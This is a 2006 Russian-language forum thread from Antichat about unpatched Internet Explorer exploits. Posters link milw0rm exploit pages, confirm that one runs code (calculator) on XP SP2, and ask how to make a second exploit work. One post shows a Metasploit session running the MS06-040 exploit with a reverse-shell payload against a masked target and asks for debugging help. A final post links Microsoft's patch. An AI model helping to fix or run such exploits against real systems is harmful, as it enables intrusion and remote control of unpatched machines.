Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Новые сплойты Ms Ie (https://forum.antichat.xyz/showthread.php?t=24422)

melco 25.09.2006 14:45

Новые сплойты Ms Ie
 
Нашел новые сплойты на MS IE, на которые еще нет заплатки. Работает на ура вот это, калькулятор запускает. На Win2000 IE вырубается, но калькулятора не дает:
Код:

http://milw0rm.org/exploits/2425
Это компилится, но мою винду не цепляет, хотя на ту же дыру
Код:

http://milw0rm.org/exploits/2403
как подправить второй сплойт так, что бы он работал на ура как и первый?

Мерси всем, кто раздуплит.

edos 25.09.2006 15:38

http://milw0rm.org/exploits/2425 - тестанул вот этот, осел вылетел и запустилось 2 (два) калькулятора (XP SP2)

-=lebed=- 27.09.2006 10:21

Затестил сплоит от jamikazu - работает на SP2+IE
Провериться на запуск калькулятора можно Тут

А от метасплоита что-то не пашет (удалённый)

msf > cd framework
msfconsole: chdir: changed to directory framework
msf > use netapi_ms06_040
msf netapi_ms06_040 > set RHOST хх.хх.хх.2
RHOST -> хх.хх.хх.2
msf netapi_ms06_040 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set LHOST хх.хх.хх.1
LHOST -> хх.хх.хх.1
msf netapi_ms06_040(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] WARNING: Failed to create pipe to \BROWSER: Create returned NT status 0xc0000034 at /home/framework/lib/Pex/DCERPC.pm line 869.
[*] Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:хх.хх.хх.2[\BROWSER]
[*] Exiting Reverse Handler.
msf netapi_ms06_040(win32_reverse) >

Что то не так в либе DCERPC.pm ? (или она старой версии?)

madnet 27.09.2006 10:57

Сегдня вышел UPDATE заплатки на VML
http://www.microsoft.com/athome/security/update/bulletins/200609.mspx


Время: 09:37